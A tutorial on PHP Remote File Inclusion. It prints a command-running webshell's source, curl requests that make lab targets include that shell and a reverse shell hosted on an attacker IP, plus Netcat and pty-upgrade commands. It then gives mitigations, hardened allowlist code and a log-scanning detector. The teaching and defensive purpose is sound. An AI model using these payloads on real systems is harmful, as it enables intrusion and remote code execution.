Remote File Inclusion (RFI)

Published on March 13, 2025


Remote File Inclusion (RFI) vulnerabilities are less common than Local File Inclusion (LFI) because they depend on a specific server configuration. In PHP, for example, the allow_url_include option must be enabled; it has been disabled by default for many years and is deprecated as of PHP 7.4. Where LFI only lets an attacker include files that already exist on the server, RFI lets them include a file fetched from a system they control, over HTTP or over SMB (on Windows a UNC path such as \\attacker\share\shell.php is handled as a filesystem path, so that variant is not gated by allow_url_include). The included code runs on the target, in the web application's context and with its privileges.

1. Exploiting RFI with Web Shells

Attackers often use RFI to include a webshell, a small script that exposes a command line through a web page. Kali Linux ships several PHP webshells in /usr/share/webshells/php/. Below is simple-backdoor.php from that directory:

<?php
// Runs whatever arrives in the cmd parameter (GET or POST) and returns its output
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

The usage line in the shell's own header assumes the file has been dropped onto the target and is requested directly:

http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

With RFI the file never lands on the target's disk. The attacker hosts it on their own machine and passes its URL in the vulnerable include parameter; because the included code executes inside the same request as the vulnerable page, a cmd parameter appended to that request reaches the shell through $_REQUEST.

2. Hosting a Malicious File

For RFI to work, the target must be able to fetch the malicious file. The simplest way to serve it is Python's built-in web server, started from the directory that holds the shell:

kali@kali:/usr/share/webshells/php$ python3 -m http.server 80

Binding port 80 requires root, so prefix the command with sudo or pick a high port and include it in the URL below. A plain file server is the right choice here: it returns the PHP source verbatim, whereas a PHP-enabled web server on the attacker's side would execute the shell locally instead of handing the target its code.

With the file reachable, force its inclusion through the vulnerable page parameter (quote the URL so the shell does not treat & as a background operator; encode spaces in the command as + or %20):

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

The response contains the listing of the web application's working directory on the target, confirming that the remote file was fetched and executed there. From this foothold the attacker can escalate to an interactive session by spawning a reverse shell with Netcat.

3. Going Further: Injecting a Reverse Shell

The same mechanism can deliver a full reverse shell instead of a one-command backdoor. The one used here is pentestmonkey's php-reverse-shell.php, which Kali ships in /usr/share/webshells/php/. Before serving it, edit the file and set $ip to your listening address and $port to the port you will listen on, 4444 here.

Then host the directory with a web server the target can reach:

kali@kali:/usr/share/webshells/php$ python3 -m http.server 80

Listen on port 4444 with Netcat:

nc -nlvp 4444

Trigger the inclusion through the vulnerable parameter, pointing at your web server:

curl "http://192.168.211.16/meteor/index.php?page=http://192.168.45.183/php-reverse-shell.php"

curl hangs while the shell is connected; that is expected, the session shows up in the Netcat listener. The shell you get is not a proper terminal, so upgrade it to a pty:

script /dev/null -c bash

If script is not available on the target, python3 -c 'import pty; pty.spawn("/bin/bash")' achieves the same.

4. Mitigating RFI Vulnerabilities

To prevent RFI, developers and administrators should:

  • Keep allow_url_include disabled in php.ini. It is Off by default and deprecated since PHP 7.4; never re-enable it to make a feature work.
  • Never pass user input to include or require. Resolve the request parameter against a fixed allowlist of page names that maps to file paths chosen by the application, and reject anything that is not a known key.
  • Validate any input that still influences file selection: reject values containing a URL scheme, a PHP stream wrapper (php://, data://, expect://), a UNC prefix or directory traversal sequences.
  • Monitor web server logs for parameter values that carry URLs or wrappers, and alert on outbound HTTP or SMB connections initiated by the web server process, which a PHP application normally has no reason to make.
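The vulnerable pattern beside its allowlisted replacement, as an added example that is not code from the original page or from the lab application it references. The page names and the pages/ directory are assumptions; the vulnerable function is the shape of include that makes the curl requests above work.

```php
<?php
// Added example, not code from the original page or from the lab application
// it references. The page names and the pages/ directory are assumptions.

// VULNERABLE: the request parameter goes straight into include(). With
// allow_url_include=On, ?page=http://attacker/simple-backdoor.php makes PHP
// fetch that file and execute it inside this request, which is why a &cmd=
// parameter on the same URL is visible to the included shell via $_REQUEST.
function showPageVulnerable(): void
{
    include $_GET['page'];
}

// HARDENED: the parameter selects a key in a fixed allowlist and is never used
// as a path, so URLs, stream wrappers and ../ sequences cannot reach include().
// Keep allow_url_include = Off in php.ini as the second layer; this code does
// not depend on it.
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'menu'    => __DIR__ . '/pages/menu.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage($page): ?string
{
    if ($page === null || $page === '') {
        return ALLOWED_PAGES['home'];       // default when the parameter is absent
    }
    if (!is_string($page)) {
        return null;                        // page[]=... and similar tricks: reject
    }
    return ALLOWED_PAGES[$page] ?? null;    // unknown key: no file, no include
}

function showPageHardened(): void
{
    $file = resolvePage($_GET['page'] ?? null);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $file;
}

showPageHardened();
```

The important property is that no byte of user input ever becomes part of a path: the parameter is only ever compared against the keys of ALLOWED_PAGES, so there is nothing to sanitize and no encoding trick that changes which file is included.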
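A small check for the last bullet, added here as an example and not taken from the page: it scans access-log lines for query parameters that, once percent-decoded, carry a URL scheme, a PHP wrapper, a UNC prefix or a traversal sequence. The log lines are constructed for the example and mirror the requests made earlier on this page.

```php
<?php
// Added example (not from the original page): flag requests whose query
// parameters carry a remote URL, a PHP stream wrapper, a UNC path or a
// traversal sequence, the traces an RFI or LFI attempt leaves in the access log.

// Constructed sample lines in Apache common log format, made up for this example.
$sampleLog = [
    '192.168.45.183 - - [13/Mar/2025:10:01:02 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 512',
    '192.168.45.183 - - [13/Mar/2025:10:01:05 +0000] "GET /meteor/index.php?page=http://192.168.45.183/simple-backdoor.php&cmd=ls HTTP/1.1" 200 233',
    '192.168.45.183 - - [13/Mar/2025:10:01:09 +0000] "GET /meteor/index.php?page=http%3A%2F%2F192.168.45.183%2Fphp-reverse-shell.php HTTP/1.1" 200 0',
    '10.0.0.7 - - [13/Mar/2025:10:02:11 +0000] "GET /meteor/index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096',
    '10.0.0.7 - - [13/Mar/2025:10:02:15 +0000] "GET /meteor/index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [13/Mar/2025:10:03:00 +0000] "GET /meteor/about.html HTTP/1.1" 200 1024',
];

// A value is suspicious when, after percent-decoding, it starts with a URL
// scheme (http://, ftp://, php://, data://, ...) or a UNC prefix (\\host\share),
// or contains "../" anywhere. Decoding first is what catches the third line,
// which a plain grep for "http://" over the raw log would miss.
const SUSPICIOUS_VALUE = '~^(?:[a-z][a-z0-9+.-]*://|\\\\\\\\)|\.\./~i';

function flagInclusionAttempts(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Pull the request target out of the quoted request line.
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue;
        }
        $parts = explode('?', $m[1], 2);
        if (count($parts) < 2) {
            continue;                       // no query string, nothing to inspect
        }
        parse_str($parts[1], $params);      // parse_str() percent-decodes the values
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match(SUSPICIOUS_VALUE, $value)) {
                $hits[] = ['param' => $name, 'value' => $value, 'line' => $line];
            }
        }
    }
    return $hits;
}

foreach (flagInclusionAttempts($sampleLog) as $hit) {
    printf("%s=%s\n", $hit['param'], $hit['value']);
}
```

Run against the sample, four of the six lines are flagged (the two webshell inclusions, the php://filter read and the traversal), while the ordinary page request and the static file pass. On a real server feed it the access log line by line and pair the hits with the outbound-connection alerts mentioned in the list above; an inclusion that actually succeeded shows up as both.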